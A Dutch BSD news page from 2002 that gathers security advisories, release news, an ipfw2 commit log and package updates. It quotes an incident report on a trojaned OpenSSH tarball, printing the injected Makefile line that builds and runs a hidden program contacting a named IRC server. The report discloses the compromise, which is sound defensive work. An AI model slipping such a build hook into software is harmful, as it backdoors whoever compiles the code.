News

Na FreeBSD komt ook NetBSD met security patches op de proppen voor:
[url=ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-010.txt.asc]pppd[/url]
[url=ftp://ftp.NetBSD.ORG/pub/NetBSD/security/advisories/NetBSD-SA2002-011.txt.asc]Sun RPC XDR decoder[/url]
[url=ftp://ftp.NetBSD.ORG/pub/NetBSD/security/advisories/NetBSD-SA2002-009.txt.asc]en OpenSSL[/url]

zo blijkt maar weer eens dat de verschillende BSD’s hun code delen.

Freebsd 4.6.1 zal waarschijnlijk ergens volgende week uitgebracht worden blijkt uit een e-mail van Murray Stokley‚ lid van het FreeBSD Release Engg. team. Het grootste obstakel voor 4.6.1 zijn de ATA problemen geweest‚ welke gerepareerd zijn door een paar programerings wijzigingen. De beveiligings medewerkers willen deze release 4.6.2 noemen‚ om de laatste onveiligheiden in FreeBSD kwesties en code fixes.

Het nieuwste FreeBSD schema voor toekomstige releases is te vinden op het [url=http://www.freebsd.org/releng/index.html#schedule]FreeBSD Engineering Info page. [/url]

Hier volgt het volledige artikel:

[quote]

**********************************************
From: Murray Stokely
To: vendors@FreeBSD.org
Cc: re@FreeBSD.org
Subject: 4.6.1

The ATA problems appears to be fixed with Soren’s most recent change.
This was the biggest holdup for 4.6.1. We also have a successfull
package build for the point release. However‚ in light of new
vulnerabilities‚ the security officers are going to merge in a few
more changes. The so@ would like to call the release 4.6.2 in light
of these new additions and the fact that the RELENG_4_6 branch has
been called 4.6.1 for over 10 days now.

Please email re@ and so@ if calling the release 4.6.2 ISO would
adversely affect your business (i.e.‚ you already have labels printed
that say 4.6.1?).

We are going to have to rebuild the packages with these new security
fixes‚ so we are again‚ at least half a week away from the release. ;(

– Murray

[/quote]

Edwin Groothuis is er achter gekomen dat op de ftp site van openbsd.org een vervuilde OpenSSH aanwezig was.
Deze vervuilde OpenSSH zorge voor een aanpassing het configure script zodat er een shell script gegenereerd wordt dat probeert verbinding te leggen
met een Australische server en zo mogelijk een DDOS aanval kan uitvoeren.
Het besmette bestand is inmiddels verwijderd.

De mail van Edwin Groothuis
[quote]Date: Thu‚ 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings‚

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)

The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin[/quote]

Na de melding van lek in stdio volgen er nog een aantal meer meldingen van security gaten.
De volgende programma’s hebben probleempje:
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:32.pppd.asc]FreeBSD-SA-02:32.pppd Topic: exploitable race condition in pppd[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:33.openssl.asc]FreeBSD-SA-02:33.openssl Topic: openssl contains multiple vulnerabilities[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:34.rpc.asc]FreeBSD-SA-02:34.rpc Topic: Sun RPC XDR decoder contains buffer overflow[/url]

Deze webserver is zijn uptime helaas ook weer kwijt.
Dus update je world voor de zekerheid.
Wil je automatisch op de hoogte gehouden worden van security meldingen‚ dan dien je een mailtje te sturen naar:
majordomo@FreeBSD.ORG met
subscribe freebsd-security-notifications jaap@aap.nl

in het bericht gedeelte

Het FreeBSD beveiligings team heeft een gereviseerd beveiligings advies gepost. Dit advies wijst op onveilig handelen van stdio file descriptors. Dit betreft alle releases van FreeBSD tot en met 4.6.
De orginele oplossing voor dit probleem loste niet alles op‚ daarom is er nieuwe patch beschikbaar.

Hierdoor hebben lokale gebruikers nog steeds de mogelijkheid tot superuser privileges.
Het is bekend dat ‘keyinit’ set-user-id program nog steeds uitvoerbaar is met deze methode. Er is een moegelijkheid dat er meerde programma’s uitvoerbaar zijn.

De Advisory:
[quote]

************************************
Date: Tue‚ 30 Jul 2002 11:21:05 -0700 (PDT)
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED]

—–BEGIN PGP SIGNED MESSAGE—–

==================================================
===========================
FreeBSD-SA-02:23.stdio Security Advisory
The FreeBSD Project

Topic: insecure handling of stdio file descriptors

Category: core
Module: kernel
Announced: 2002-04-22
Credits: Joost Pol ‚
Georgi Guninski
Affects: All releases of FreeBSD up to and including 4.6-RELEASE
4.6-STABLE prior to the correction date
Corrected: 2002-07-30 15:40:46 UTC (RELENG_4)
2002-07-30 15:42:11 UTC (RELENG_4_6)
2002-07-30 15:42:46 UTC (RELENG_4_5)
2002-07-30 15:43:17 UTC (RELENG_4_4)
FreeBSD only: NO

0. Revision History

v1.0 2002-04-22 Initial release
v1.1 2002-04-23 Patch and revision numbers updated
v1.2 2002-07-29 procfs issue; updated patch

I. Background

By convention‚ POSIX systems associate file descriptors 0‚ 1‚ and 2
with standard input‚ standard output‚ and standard error‚
respectively. Almost all applications give these stdio file
descriptors special significance‚ such as writing error messages to
standard error (file descriptor 2).

In new processes‚ all file descriptors are duplicated from the parent
process. Unless these descriptors are marked close-on-exec‚ they
retain their state during an exec.

All POSIX systems assign file descriptors in sequential order‚
starting with the lowest unused file descriptor. For example‚ if a
newly exec’d process has file descriptors 0 and 1 open‚ but file
descriptor 2 closed‚ and then opens a file‚ the new file descriptor is
guaranteed to be 2 (standard error).

II. Problem Description

Some programs are set-user-id or set-group-id‚ and therefore run with
increased privileges. If such a program is started with some of the
stdio file descriptors closed‚ the program may open a file and
inadvertently associate it with standard input‚ standard output‚ or
standard error. The program may then read data from or write data to
the file inappropriately. If the file is one that the user would
normally not have privileges to open‚ this may result in an
opportunity for privilege escalation.

The original correction for this problem (corresponding to the first
revision of this advisory) contained an error. Systems using procfs
or linprocfs could still be exploited. The dates for the original‚
incomplete correction were:

Corrected: 2002-04-21 13:06:45 UTC (RELENG_4)
2002-04-21 13:08:57 UTC (RELENG_4_5)
2002-04-21 13:10:51 UTC (RELENG_4_4)

III. Impact

Local users may gain superuser privileges. It is known that the
`keyinit’ set-user-id program is exploitable using this method. There
may be other programs that are exploitable.

IV. Workaround

[FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]

None. The set-user-id bit may be removed from `keyinit’ using the
following command‚ but note that there may be other programs that can
be exploited.

# chmod 0555 /usr/bin/keyinit

[FreeBSD versions 4.5-RELEASE-p4 or later‚ 4.4-RELEASE-p11 or later‚
4.6-RELEASE‚ and 4.6-STABLE]

Unmount all instances of the procfs and linprocfs filesystems using
the umount(8) command:

# umount -f -a -t procfs
# umount -f -a -t linprocfs

V. Solution

The kernel was modified to check file descriptors 0‚ 1‚ and 2 when
starting a set-user-ID or set-group-ID executable. If any of these
are not in use‚ they will be redirected to /dev/null.

1) Upgrade your vulnerable system to 4.6-STABLE; or to any of
the RELENG_4_6 (4.6.1-RELEASE-p1)‚ RELENG_4_5 (4.5-RELEASE-p10)‚ or
RELENG_4_4 (4.4-RELEASE-p17) security branches dated after the
respective correction dates.

2) To patch your present system:

a) Download the relevant patch from the location below‚ and verify the
detached PGP signature using your PGP utility.

[FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C…tdio.patch.v1.2
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C….patch.v1.2.asc

[FreeBSD versions 4.5-RELEASE-p4 or later‚ 4.4-RELEASE-p11 or later‚
4.6-RELEASE‚ and 4.6-STABLE]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C…dio2.patch.v1.2
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C….patch.v1.2.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch c) Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Path Revision Branch - ------------------------------------------------------------------------- sys/sys/filedesc.h RELENG_4 1.19.2.4 RELENG_4_6 1.19.2.4 RELENG_4_5 1.19.2.3.6.1 RELENG_4_4 1.19.2.3.4.1 sys/kern/kern_exec.c RELENG_4 1.107.2.15 RELENG_4_6 1.107.2.14.2.1 RELENG_4_5 1.107.2.13.2.2 RELENG_4_4 1.107.2.8.2.3 sys/kern/kern_descrip.c RELENG_4 1.81.2.12 RELENG_4_6 1.81.2.14 RELENG_4_5 1.81.2.9.2.2 RELENG_4_4 1.81.2.8.2.2 sys/conf/newvers.sh RELENG_4_6 1.44.2.23.2.6 RELENG_4_5 1.44.2.20.2.11 RELENG_4_4 1.44.2.17.2.16 - ------------------------------------------------------------------------- VII. References PINE-CERT-20020401
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.0.7 (FreeBSD)

iQCVAwUBPUbXw1UuHi5z0oilAQFgKQP/eOnmHorw/4NVEAEKTQp4+X7Px9p1wUGq
6OcLH5GuTbbwexd7KbCjbjzNZF7zgz1Qph2v7NQXb+W/ZaW2hEgcoURXkBomVxjl
61oXu72P35bmgNo7GQ794v/WDHd8FymtBv0kyY/vuZqg6l99tTuwi2ryV1ZszVrh
w21lAbhkyQo=
=YGVw
—–END PGP SIGNATURE—– [/quote]

De heer Luigi Rizzo heeft zijn nieuwe ipfw (firewall) code aan FreeBSD stable toegevoegt. Volgens zijn metingen is de nieuwe code 2 keer zo snel in verwerken van individuele firewall regels. Handig is dat de ruleset syntax backwards compatible is.

De volledige annoucement
[quote]
FYI….

(please read the commit log below before complaining).

cheers
luigi

—– Forwarded message from Luigi Rizzo —–

Date: Tue‚ 23 Jul 2002 20:21:24 -0700 (PDT)
From: Luigi Rizzo
Subject: cvs commit: src/sys/netinet ip_fw2.c ip_fw2.h src/sys/conf files
options src/sbin/ipfw Makefile ipfw2.c src/lib/libalias Makefile
alias_db.c
To: cvs-committers@FreeBSD.ORG‚ cvs-all@FreeBSD.ORG

luigi 2002/07/23 20:21:24 PDT

Modified files: (Branch: RELENG_4)
sys/conf options files
sbin/ipfw Makefile
lib/libalias Makefile alias_db.c
Added files: (Branch: RELENG_4)
sys/netinet ip_fw2.h ip_fw2.c
sbin/ipfw ipfw2.c
Log:
Bring ipfw2 into the -stable tree. This will give more people a
chance to test it‚ and hopefully accelerate the transition from the
old to the new ipfw code.

NOTE: THIS COMMIT WILL NOT CHANGE THE FIREWALL YOU USE‚
NOR A SINGLE BIT IN YOUR KERNEL AND BINARIES.
YOU WILL KEEP USING YOUR OLD “ipfw” UNLESS YOU:

+ add “options IPFW2” (undocumented) to your kernel config file;

+ compile and install sbin/ipfw and lib/libalias with
make -DIPFW2

in other words‚ you must really want it.

On the other hand‚ i believe you do really want to use this new
code. In addition to being twice as fast in processing individual
rules‚ you can use more powerful match patterns such as

… ip from 1.2.3.0/24{50‚6‚27‚158} to …
… ip from { 1.2.3.4/26 or 5.6.7.8/22 } to …
… ip from any 5-7‚9-66‚1020-3000‚4000-5000 to …

i.e. match sparse sets of IP addresses in constant time; use “or”
connectives between match patterns; have multiple port ranges; etc.
which I believe will dramatically reduce your ruleset size.

As an additional bonus‚ “keep-state” rules will now send keepalives
when the rule is about to expire‚ so you will not have your remote
login sessions die while you are idle.

The syntax is backward compatible with the old ipfw.
A manual page documenting the extensions has yet to be completed.

Revision Changes Path
1.13.2.5 +4 -1 src/lib/libalias/Makefile
1.21.2.14 +151 -36 src/lib/libalias/alias_db.c
1.6.6.3 +5 -1 src/sbin/ipfw/Makefile
1.4.2.1 +3166 -0 src/sbin/ipfw/ipfw2.c (new)
1.340.2.107 +1 -0 src/sys/conf/files
1.191.2.41 +1 -0 src/sys/conf/options
1.6.2.1 +2622 -0 src/sys/netinet/ip_fw2.c (new)
1.1.2.1 +404 -0 src/sys/netinet/ip_fw2.h (new)
[/quote]

Bron: [url=http://www.bsdforums.com/forums/showthread.php?s=3e43558cbde77da8f070e490e5b35b06&threadid=2171]bsdforums.org[/url]
Alistar Crooks heeft de nieuwste veranderingen en toevoegingen van de Package Collection van eind Juni 2002 gepost op het NetBSD mailing list. Volgens zijn berekeningen zaten er 2970 packages in de Packages Collection‚ ong. 2898 van de vorige maand en 72 gloednieuwe packages.

[quote]
[Full announcement]

**************************************
Summary of Changes to the NetBSD Packages Collection in June 2002
==================================================
===============

By my calculations‚ there were 2970 packages in the packages collection
at the end of June‚ up from 2898 the previous month‚ a rise of 72.

Notable additions to the packages collection include: adom‚ ap2-perl‚
arirang‚ autoconvert‚ bbmail‚ bbrun‚ bg5ps‚ Canna-dict and server‚
check‚ Chinput‚ cross-h8300-hms binutils and gcc‚ demime‚ dnetc‚
docsis‚ eblook‚ edonkey2k‚ eggdrop‚ emech‚ esms‚ fcgi‚ gkrellm-volume‚
glpk‚ goofey‚ gscope‚ gsmlib‚ hypermail‚ hztty‚ icepref‚ FreeWnn dict
and server‚ ja-samba‚ some kde3 packages (thanks to Nick‚ Mark‚ Jan
and everyone)‚ kttcp‚ leafnode‚ lhs‚ libtabe‚ links-gui‚ metacity‚
mpg123-esound‚ mpg321‚ mpgtx‚ mtoolsfm‚ nbitools‚ various Perl
utilities‚ pcl-cvs‚ php4-mhash‚ various Python Unicode codecs‚ pyDict‚
randread‚ the rox suite (thanks‚ Chris)‚ sipcalc‚ sj3 dict and server‚
star‚ stardic‚ su2‚ swill‚ sylpheed-claws‚ ttmkfdir‚ unicon‚
windowmaker-desktop‚ wmmp3‚ wmsmixer‚ wmusic‚ xbindkeys‚ xcin‚ xclip‚
xfm‚ yafc‚ yamt and yup.

Notable updated packages in the packages collection include:
amavis-perl‚ ap-ssl‚ apache‚ apache6‚ asp2php‚ atk‚ audit-packages‚
awka‚ bidwatcher‚ bind4‚ bind8‚ bozohttpd‚ canna lib and server‚
canuum‚ cheesetracker‚ coda5 (client and server)‚ conserver‚
courier-imap‚ cpuflags‚ curl‚ cvsweb‚ dillo‚ doc++‚ eb‚ ekg‚ ethereal‚
ettercap‚ exim‚ exim-html‚ frotz‚ fvwm2‚ galeon‚ geneweb‚ gkrellm‚
gkrellm-xmms‚ gmplayer‚ gnumeric‚ gtkasp2php‚ htmlfix‚ id3v2‚ ipa‚
irssi‚ FreeWnn lib and server‚ ja-samba‚ kaffe‚ liba52‚ libirman‚
links‚ lsof‚ lukemftp‚ lwp‚ mencoder‚ micq‚ mlterm‚ mozilla‚ mplayer
and mplayer-share‚ msu‚ mysql-client‚ nxtvepg‚ ocaml‚ ogle and
ogle_gui‚ openssh‚ oto‚ various Perl utilities‚ pango‚ pdflib‚
pgpdump‚ pkgchk‚ pkglint‚ pkg_install‚ polsms‚ postfix‚ proftpd‚
pure-ftpd‚ various Python utilities‚ the rox suite‚ rvm‚ samba‚ scmxx‚
silc client and server‚ sj3 lib and server‚ skill‚ stow‚ sylpheed‚
teapop‚ TeXmacs‚ thttpd‚ tits‚ ttf2pt1‚ uvscan-dat‚ vid‚ vttest‚
x11-links‚ xchat‚ xpmroot‚ xservers and ysm.

Package of the Month award goes to links-gui‚ nominated by Matt Green.
“It’s the fastest graphical/javascript enabled browser i’ve seen and
it acts just like tty links”.

Alistair G. Crooks
Wed Jul 24 12:05:13 BST 2002
[/quote]

Een nieuwe “Proportional Share Scheduler” is bescikbaar als patch voor FreeBSD. Luigi Rizzo noemt het een “weight-based process scheduler”‚ dat gebruik maakt van het “”WF2Q+ algorithm” (ook gebruikt in dummynet).
De reden voor het gebruik van deze scheduler wordt hieronder uitgelegt a.d.h.v. een document van de universiteit van Utah:
[quote]There are compelling reasons to use proportional share scheduling techniques to support multimedia and other soft real-time applications on general-purpose operating systems. First‚ proportional share (PS) schedulers are a good match for existing infrastructure such as a periodic timer interrupt and mechanisms for assigning priorities to applications — priorities can be mapped to shares in a proportional-share environment. Second‚ PS schedulers provide stronger guarantees to applications than do traditional time-sharing schedulers: they allocate a specific fraction of the CPU to each thread‚ and some schedulers provide error bounds on the allocation rate. Third‚ PS schedulers have clear semantics during underload: excess CPU time is allocated fairly‚ in contrast with some reservation-based schedulers that must idle or back off to a secondary scheduling policy once all application budgets are exhausted.[/quote]

Om daadwerkelijk gebruik te maken van de process scheduler is men in dit project ook bezig om het mogelijk om te switchen tussen de verschilende schedulers.
[quote]to make the process/thread/kse scheduler a replaceable piece of the kernel‚ requiring no modificationsto the “struct proc”‚ and with the ability of switching from one scheduler to another one at runtime (this both for testing purposes and for whatever need may arise).[/quote]

Voor meer info:
[url=http://www.kerneltrap.com/node.php?id=349]Het artikel[/url]
[url=http://www.cs.utah.edu/flux/papers/ps-rtss01/]Info over de scheduler[/url]

Bron: [url=http://64.91.232.9/xf/forum/forum.php?forum_id=14]microbsd.net[/url]
Afgelopen dinsdag is MicroBSD 0.5 gereleased. Het is een stabiele versie met een aantal [url=http://64.91.232.9/xf/docman/display_doc.php?docid=2&group_id=1]nieuwe features[/url] en een update van oudere onderdelen.
Er zit tevens een code bij voor updates voor alle bekende OpenBSD beveiligings patches. Ze hebben alle informatie in de changelog gezet.

De volgende features zijn aanwezig:
* Posix1e Audit Controls & logging (systrace‚ aclctl)
* Network Port ACLs (sysctl)
* Integrated systrace facilities (systrace)
* File System level ACLS (getfacl‚ setfacl)
* Binary integrity verification (k5ctl)
* Trusted Path Execution (aclctl)
* Application/Users Access Controls (systrace)
* Application Stack Hardening & Protection (integrated)
* Full State-full packet inspection
* IPV4/IPV6 capable
* PF Packet Filter (pf‚ pfctl‚ authpf)
* Invisible Bridged Firewall Capable (brconfig)
* NAT‚ Reverse NAT‚ FTP proxy support‚ one to one NAT
* IPSec VPN (isakmp‚ sa)
* ISAKMP
* Privacy Sub-System (integrated)
* Capable of running on disk‚ /cdrom or Compact Flash
* Optimized kernel for handling large traffic flows
* No unnecessary daemons‚ services.
* Easy to Install via our ftp server‚ cdrom and floppy disk (NOW)

Bron: [url=http://www.freebsdforums.org/forums/showthread.php?s=848e759c4175d2dda2e2313b888439d1&threadid=2115]Bron[/url]
CNet’s Robert Lemos meldt dat een er een lek is gevonden in de nieuwe versies van PHP‚ dat aanvallers doet slagen en in somige gevallen complete servers kan rooten.
Een open-source producers groep kondigde Maandag aan:
[quote]Van php.net: De PHP groep heeft vandaag de details aangekonditg van een seriues lek in PHP versies 4.2.0 en 4.2.1. Een beveiligings update‚ PHP 4.2.2 lost deze kwestie op.
Iedere gebruiker van de oudere versies van PHP wordt geadviseerd haar web server up te graden. De nieuwe release (4.2.2) bevat geen andere veranderingen dus upgraden is zonder consequenties.
[/quote]
De FreeBSD ports tree is al up to date. OpenBSD en NetBSD volgen Freebsd’s voorbeeld.

Het volledige [url=http://zdnet.com.com/2102-1105-945502.html]artikel[/url] is hier te lezen.